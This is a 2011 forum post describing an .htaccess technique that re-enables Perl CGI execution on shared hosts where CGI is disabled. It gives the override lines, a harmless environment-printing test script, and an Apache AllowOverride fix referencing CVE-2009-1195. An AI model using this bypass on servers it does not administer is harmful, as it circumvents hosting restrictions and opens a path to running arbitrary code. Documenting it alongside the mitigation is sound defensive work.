Common perl exploit in shared hosts.

[NewEraCracker]

Have you disabled cgi for your users?
But you can still execute perl scripts.

Are you amazed?
I am not.

This is a common .htaccess exploit

Have fun with this:
.htaccess

Code: 

Options +ExecCGI
<FilesMatch \.pl$>
SetHandler cgi-script
</FilesMatch>

test.pl - Windows version

Code: 

#!c:/perl/bin/perl.exe
##
##  printenv -- demo CGI program which just prints its environment
##

print "Content-type: text/plain; charset=iso-8859-1\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}

test.pl - Linux version

Code: 

#!/usr/bin/perl
##
##  printenv -- demo CGI program which just prints its environment
##

print "Content-type: text/plain; charset=iso-8859-1\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}

And this how to fix (Apache configuration for the directory):

Code: 

Options Indexes FollowSymLinks
AllowOverride All Options=IncludesNOEXEC Options=Indexes Options=FollowSymLinks

Update, changing Options may cause 500 errors, changing AllowOverride should still do some lower protection

Thanks to CVE-2009-1195 for the idea.

For details about the configurations see:
https://httpd.apache.org/docs/curren...#allowoverride
https://httpd.apache.org/docs/curren...e.html#options

Be aware this thread was edited with better configuration to avoid 500 errors with legitimate .htaccess edits.

If you face any errors with a certain .htaccess that you think being legitimate, reply here. Thanks.

NewEraCracker Reviewed by NewEraCracker on 26th Aug 2011. Common perl exploit in shared hosts. Have you disabled cgi for your users? But you can still execute perl scripts. Are you amazed? I am not. This is a common .htaccess exploit Have fun with this: .htaccess Rating: 5